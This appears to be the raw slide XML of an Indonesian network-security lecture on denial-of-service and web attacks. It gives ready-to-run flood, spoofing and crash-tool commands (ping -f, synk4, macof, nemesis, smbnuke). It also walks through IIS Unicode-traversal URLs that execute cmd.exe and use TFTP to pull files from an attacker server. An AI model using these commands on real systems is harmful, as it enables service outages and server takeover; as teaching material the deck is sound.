            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Menggunakan IPspoofing (mengubah no IP dari request)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Respon dari ping dialamatkan ke komputer yang IP-nya dispoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Akibatnya komputer tersbut akan banyak menerima paket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Terjadi pemborosan bandwidth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Dapat mengakibatkan DoS Attack</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Serangan DoS ke Jaringan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gunakan network monitoring tools (misal EtherApe atau Sniffer Pro) untuk melihat efek serangan berikut</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ping flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ping –f –s 1000 target.indocisc.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Naikkan besar paket untuk melihat efeknya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Gunakan beberapa penyerang sekaligus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SYN Flooding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SYN flood dengan synk4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>synk4 srcaddr destaddr startport endport</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>srcaddress = 0 untuk random</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>synk4 192.168.1.101 192.168.1.7 1 139</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> synk4 0 192.168.1.7 1 140</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MAC address flooding &amp; spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>macof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Windows ICMP/SYN Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>SkyDance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: terdiri dari dua komponen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Server dijalankan di background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Client memberikan perintah ke server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>client.exe server password kill type target srcIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>client.exe 192.168.1.10 nerv kill icmp 192.168.1.1 10.10.10.10</a:t>
            </a:r>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Session HOG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Membuat sebanyak-banyaknya connection kepada sebuah servis dan diam saja tanpa memberikan query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Contoh:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	netcat target.indocisc.com 80 &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Membuat perintah di atas dalam sebuah script yang menjalankannya secara berulang-ulang (misal 500 kali)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Connection akan terbentuk sampai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> (dalam satuan menit, cukup lama)</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SNMP Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Banyak perangkat jaringan menggunakan SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Serangan SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Memberikan perintah string yang panjang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Dan berbagai pengujian untuk melewati batas array (out of bound attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Akibatnya: SNMP daemon mati, bahkan reboot, perangkat tidak dapat dikelola dari jarak jauh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Attack.pl 192.168.1.100</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Membuat paket palsu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Menggunakan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" smtClean="0"/>
              <a:t>packet creation tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Nemesis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Membuat paket ICPM dari 192.168.1.1 ke 192.168.1.100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nemesis-icmp –S 192.168.1.1 –D 192.168.1.100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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Serangan ke OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Windows NT/2000/XP (unpatched)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>killwin, targa3, boink, jolt, winnuke, SMBdie, smbnuke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smbnuke 192.168.1.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UNIX / AIX / Solaris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Serangan ke service tertentu membuat hang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>menjadi root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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>WEB Defacing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 5"/>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WEB Defacing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://online.securityfocus.com/bid/1806</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0"/>
              <a:t>Skenario yang akan dilakukan adalah sebagai berikut:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="·"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0"/>
              <a:t>Browser B, target IIS T (192.168.0.1 dalam contoh ini), TFTP server di S. (Catatan: TFTP server dapat juga di komputer B).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="·"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0"/>
              <a:t>Dari browser B, browse URL khusus yang efeknya adalah mendownload file dari S ke T melalui mekanisme TFTP. Perhatikan syntax TFTP dan juga arah (apakah PUT atau GET):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TFTP host {get|put} remotefilename localfilename</a:t>
            </a:r>
            <a:endParaRPr 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Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Domain Name System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menggunakan whois, dig, nslookup, host, bahkan search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data-data server dari target (Name Server), alamat kantor, nomor IP, MX record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Komputer-komputer dan nomor Ipnya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sebagian besar dari data-data ini tersedia untuk publik (sama dengan alamat dari sebuah perusahaan)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IIS Defacing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://192.168.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="·"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" smtClean="0"/>
              <a:t>Mencari tahu root directory web server. Biasanya diletakkan di direktori /inetpub/wwwroot. Cek juga apakah dia berada pada harddisk yang sama (C:) atau disk lain (D:)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://192.168.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?c+dir+/inetpub/wwwroot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Cek apakah TFTP dapat dieksekusi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://192.168.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+/winnt/system32/tftp.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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IIS Defacing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Rename startpage jika perlu. Ingat, dia tidak dapat ditimpa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
